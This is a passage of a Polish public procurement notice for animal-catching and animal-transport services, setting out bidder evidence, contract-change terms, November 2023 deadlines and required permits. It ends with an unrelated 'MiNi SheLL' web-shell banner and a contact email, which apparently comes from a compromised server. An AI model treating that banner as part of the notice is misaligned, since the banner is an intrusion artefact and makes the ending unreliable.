najmniej <br/>6 miesięcy do dnia, w którym upływa termin składania ofert i o wartości nie mniejszej niż 50 000,00 zł brutto w okresie 6 miesięcy.<br/><br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wówczas Wykonawca wykazuje te usługi, w których wykonaniu bezpośrednio uczestniczył. Analogicznie w przypadku polegania <br/>na zdolnościach zawodowych podmiotu udostepniającego zasoby.<br/> W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku została wyrażona <br/> w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP<br/> dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe składane w celu potwierdzenia braku podstaw wykluczenia Wykonawcy:<br/>1)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust 1 ustawy w zakresie podstawy wykluczenia <br/>z postępowania z art. 108 ust. 1 pkt 1, 2, 3, 4 i 6 ustawy i z art. 7 ust. 1 ustawy z dnia <br/>13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/>(Dz. U. z 2023 r. poz. 1497),<br/>2)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową<br/> albo<br/> oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowy środek dowodowy składany w celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu:<br/>1)	wykaz usług wykonanych, w okresie ostatnich 3 lat, licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, <br/>na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – oświadczenie wykonawcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 57 – 60 ustawy.<br/>2.	Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia.<br/>3.	Przed zawarciem umowy w sprawie zamówienia publicznego, wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych wykonawców, zawierającej, co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy,<br/>3)	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia,<br/>4)	wskazanie wykonawcy upoważnionego do wystawienia faktury. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy:<br/>1) zmiana postanowień niniejszej umowy może nastąpić na podstawie i pod rygorami art. 455 ustawy,<br/>2) Zamawiający przewiduje możliwość zmiany umowy w przypadku:<br/>a) zmiany stawki podatku od towarów i usług, wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej<br/>stawki godzinowej, zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki<br/>składki na ubezpieczenie społeczne lub zdrowotne, powodującej zwiększenie lub zmniejszenie kwoty wynagrodzenia<br/>Wykonawcy;<br/>(...)<br/>b) wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się przewidzieć, np. huragan, powódź; W<br/>takim przypadku na uzasadniony wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do<br/>umowy,<br/>3) poza przypadkami wskazanymi w pkt 2, Zamawiający przewiduje także zmianę wysokości wynagrodzenia Wykonawcy za<br/>realizację umowy, w przypadku zmiany kosztów Wykonawcy związanych z realizacją umowy.<br/>(...)<br/>4) Zamawiający i Wykonawca dopuszczają możliwość zmian redakcyjnych umowy oraz zmian będących następstwem<br/>zmian danych Stron ujawnionych w rejestrach publicznych.<br/>5) Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy,<br/>przez przedstawienie drugiej Stronie propozycji zmiany w formie pisemnej, które powinny zawierać:<br/>a) rodzaj i zakres zmian,<br/>b) warunki wprowadzenia zmian,<br/>c) ustalenie, że zmiany nie modyfikują ogólnego charakteru umowy.<br/>Z uwagi na ograniczoną ilość znaków szczegółowe informacje dotyczące zmiany umowy znajdują się w Rozdziale XIX SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-21 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Udostępnienie zasobów<br/><br/>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach zawodowych lub/i technicznych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych, na zasadach określonych w art. 118 -123 ustawy.<br/>2. W odniesieniu do warunków dotyczących doświadczenia Wykonawcy, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/><br/>II. Sposób i termin składania ofert<br/>Ofertę (według wzoru stanowiącego załącznik nr 1 do SWZ) wraz z wymaganymi oświadczeniami i dokumentami, tj.:<br/>1) oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu (według wzoru stanowiącego załącznik nr 2 do SWZ),<br/>2) pełnomocnictwami,<br/>3) w przypadku udostępnionych zasobów:<br/>zobowiązaniem podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy lub innym podmiotowym<br/>środkiem dowodowym, o którym mowa w art. 118 ust. 3 ustawy wraz z oświadczeniem podmiotu udostępniającego zasoby o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu w zakresie, w jakim Wykonawca powołuje się na<br/>jego zasoby (według wzoru stanowiącego załącznik nr 3 do SWZ),<br/>4) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: oświadczeniem wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy (według wzoru stanowiącego załącznik<br/>nr 4 do SWZ) i oświadczeniami o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu dot. każdego z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>należy złożyć na Platformie – zgodnie z zapisami SWZ, w terminie do dnia 21.11.2023 r., do godz. 9.00.<br/><br/>III. Informacje o formalnościach, które muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie<br/>zamówienia publicznego<br/>1. Wykonawca ma obowiązek zawrzeć umowę w sprawie zamówienia publicznego<br/>na warunkach określonych w projektowanych postanowieniach umowy stanowiących załącznik nr 5 do SWZ.<br/>2. Zamawiający poinformuje Wykonawcę o miejscu i terminie zawarcia umowy.<br/>3. Do dnia zawarcia umowy Wykonawca przedłoży Zamawiającemu:<br/>1) decyzja Powiatowego Lekarza Weterynarii w sprawie transportu zwierząt, wydana zgodnie z ustawą z dnia 11 marca<br/>2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (t.j. Dz. U. z 2023 r. poz. 1075),<br/>2) decyzja Powiatowego Lekarza Weterynarii w sprawie transportu ubocznych produktów pochodzenia zwierzęcego kat. 1,<br/>wydana zgodnie z ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt<br/>(t.j. Dz. U. z 2023 r. poz. 1075),<br/>3) zezwolenie Prezydenta Miasta Szczecin na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami,<br/>wydane zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2023 poz.<br/>1469),<br/>4) zezwolenie Prezydenta Miasta Szczecina na prowadzenie działalności polegającej na odławianiu zwierząt z terenu Gminy<br/>Miasto Szczecin, wydane zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.<br/>U. z 2023 r. poz. 1469),<br/>5) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>kopię umowy regulującej współpracę tych wykonawców, o której mowa w rozdziale IX SW

Creat By MiNi SheLL
Email: jattceo@gmail.com